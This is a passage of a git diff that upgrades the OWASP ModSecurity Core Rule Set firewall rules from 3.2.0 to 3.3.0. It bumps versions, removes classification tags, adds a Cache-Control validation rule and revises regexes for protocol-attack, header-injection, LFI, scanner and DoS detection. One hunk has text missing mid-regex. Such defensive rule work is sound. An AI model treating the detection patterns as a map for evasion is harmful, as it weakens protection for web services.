TX:block_spammer_ip "@eq 1" \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" @@ -233,7 +232,7 @@ SecRule TX:block_suspicious_ip "@eq 1" \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" @@ -256,7 +255,7 @@ SecRule TX:block_harvester_ip "@eq 1" \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" @@ -279,7 +278,7 @@ SecAction \ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.previous_rbl_check=86400'" diff --git a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf index 9b7fe5495..b453f6d46 100644 --- a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf +++ b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -36,12 +36,8 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ tag:'attack-generic',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',\ - tag:'WASCTC/WASC-15',\ - tag:'OWASP_TOP_10/A6',\ - tag:'OWASP_AppSensor/RE1',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-912-DOS-PROTECTION.conf b/rules/REQUEST-912-DOS-PROTECTION.conf index 2aab87433..0372ab88e 100644 --- a/rules/REQUEST-912-DOS-PROTECTION.conf +++ b/rules/REQUEST-912-DOS-PROTECTION.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -69,7 +69,7 @@ SecRule &TX:dos_burst_time_slice "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain,\ skipAfter:END-DOS-PROTECTION-CHECKS" SecRule &TX:dos_counter_threshold "@eq 0" \ @@ -82,7 +82,7 @@ SecRule &TX:dos_burst_time_slice "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain,\ skipAfter:END-DOS-PROTECTION-CHECKS" SecRule &TX:dos_counter_threshold "@eq 0" \ @@ -113,7 +113,7 @@ SecRule IP:DOS_BLOCK "@eq 1" \ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &IP:DOS_BLOCK_FLAG "@eq 0" \ "setvar:'ip.dos_block_counter=+1',\ @@ -137,7 +137,7 @@ SecRule IP:DOS_BLOCK "@eq 1" \ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'ip.dos_block_counter=+1'" @@ -159,7 +159,7 @@ SecRule IP:DOS_BLOCK "@eq 1" \ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOS-PROTECTION-CHECKS" @@ -178,7 +178,7 @@ SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.extension=/%{TX.1}/',\ chain" SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \ @@ -208,7 +208,7 @@ SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &IP:DOS_BURST_COUNTER "@eq 0" \ "setvar:'ip.dos_burst_counter=1',\ @@ -227,7 +227,7 @@ SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &IP:DOS_BURST_COUNTER "@ge 1" \ "setvar:'ip.dos_burst_counter=2',\ @@ -252,7 +252,7 @@ SecRule IP:DOS_BURST_COUNTER "@ge 2" \ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'ip.dos_block=1',\ expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" @@ -284,7 +284,7 @@ SecRule IP:DOS_BURST_COUNTER "@ge 1" \ tag:'platform-multi',\ tag:'attack-dos',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'ip.dos_block=1',\ expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" diff --git a/rules/REQUEST-913-SCANNER-DETECTION.conf b/rules/REQUEST-913-SCANNER-DETECTION.conf index f4a69f44d..c4ec8034e 100644 --- a/rules/REQUEST-913-SCANNER-DETECTION.conf +++ b/rules/REQUEST-913-SCANNER-DETECTION.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -44,11 +44,8 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',\ - tag:'WASCTC/WASC-21',\ - tag:'OWASP_TOP_10/A7',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ @@ -69,11 +66,8 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',\ - tag:'WASCTC/WASC-21',\ - tag:'OWASP_TOP_10/A7',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ @@ -96,11 +90,8 @@ SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \ tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',\ - tag:'WASCTC/WASC-21',\ - tag:'OWASP_TOP_10/A7',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ @@ -137,12 +128,9 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \ tag:'platform-multi',\ tag:'attack-reputation-scripting',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/AUTOMATION/SCRIPTING',\ - tag:'WASCTC/WASC-21',\ - tag:'OWASP_TOP_10/A7',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ @@ -173,12 +161,9 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \ tag:'platform-multi',\ tag:'attack-reputation-crawler',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/AUTOMATION/CRAWLER',\ - tag:'WASCTC/WASC-21',\ - tag:'OWASP_TOP_10/A7',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ diff --git a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf index 4c7935da1..b7dd8ad2b 100644 --- a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf +++ b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -57,9 +57,7 @@ SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ',\ - tag:'CAPEC-272',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -109,9 +107,7 @@ SecRule FILES_NAMES|FILES "@rx (? +# - max-stale[=] +# - min-fresh= +# - no-cache +# - no-store +# - no-transform +# - only-if-cached +# +# References: +# - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control +# - https://regex101.com/r/CZ0Hxu/22 +# +SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" "id:920510,\ + phase:1,\ + block,\ + t:none,\ + msg:'Invalid Cache-Control request header',\ + logdata:'Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'header-whitelist',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.0',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \ + "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" @@ -1171,9 +1157,8 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ @@ -1195,9 +1180,8 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ @@ -1216,9 +1200,8 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" @@ -1246,12 +1229,9 @@ SecRule &REQUEST_HEADERS:Accept "@eq 0" \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT',\ - tag:'WASCTC/WASC-21',\ - tag:'OWASP_TOP_10/A7',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ @@ -1275,9 +1255,8 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13, tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1301,12 +1280,9 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA',\ - tag:'WASCTC/WASC-21',\ - tag:'OWASP_TOP_10/A7',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'NOTICE',\ setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" @@ -1326,10 +1302,8 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ',\ - tag:'CAPEC-272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1352,7 +1326,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ @@ -1384,9 +1358,8 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1412,9 +1385,8 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ tag:'platform-windows',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ @@ -1444,9 +1416,8 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ @@ -1471,9 +1442,8 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90 tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" @@ -1492,9 +1462,8 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" @@ -1516,9 +1485,8 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63, tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" @@ -1562,7 +1530,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdegh tag:'attack-protocol',\ tag:'paranoia-level/4',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/REQUEST-921-PROTOCOL-ATTACK.conf index 70a92e474..78bcfdc91 100644 --- a/rules/REQUEST-921-PROTOCOL-ATTACK.conf +++ b/rules/REQUEST-921-PROTOCOL-ATTACK.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -44,9 +44,8 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx [\n\r]+(?:get|post|head|options|connect|put| tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/REQUEST_SMUGGLING',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -77,15 +76,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp\/(?:0\.9|1\.[01])|<(?:html|meta)\b)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \ "id:921130,\ phase:2,\ block,\ @@ -99,9 +97,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -134,9 +131,8 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/HEADER_INJECTION',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -163,9 +159,8 @@ SecRule ARGS_NAMES "@rx [\n\r]" \ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/HEADER_INJECTION',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -185,9 +180,8 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/HEADER_INJECTION',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -211,9 +205,8 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/HTTP_SPLITTING',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -223,7 +216,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ # -=[ LDAP Injection ]=- # # [ Rule Logic ] -# +# # This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada # and regex writing by Denis Kolegov. # @@ -244,7 +237,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'language-ldap',\ tag:'platform-multi',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -276,9 +269,8 @@ SecRule ARGS_GET "@rx [\n\r]" \ tag:'attack-protocol',\ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/HEADER_INJECTION',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -319,8 +311,7 @@ SecRule ARGS_NAMES "@rx ." \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/3',\ - tag:'CAPEC-460',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'" SecRule TX:/paramcounter_.*/ "@gt 1" \ @@ -334,10 +325,8 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/HTTP_PARAMETER_POLLUTION',\ tag:'paranoia-level/3',\ - tag:'CAPEC-460',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \ diff --git a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf index 77bc61740..48f9aeeb2 100644 --- a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +++ b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -40,8 +40,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@r tag:'attack-lfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" @@ -63,8 +62,7 @@ SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (? tag:'attack-lfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ multiMatch,\ 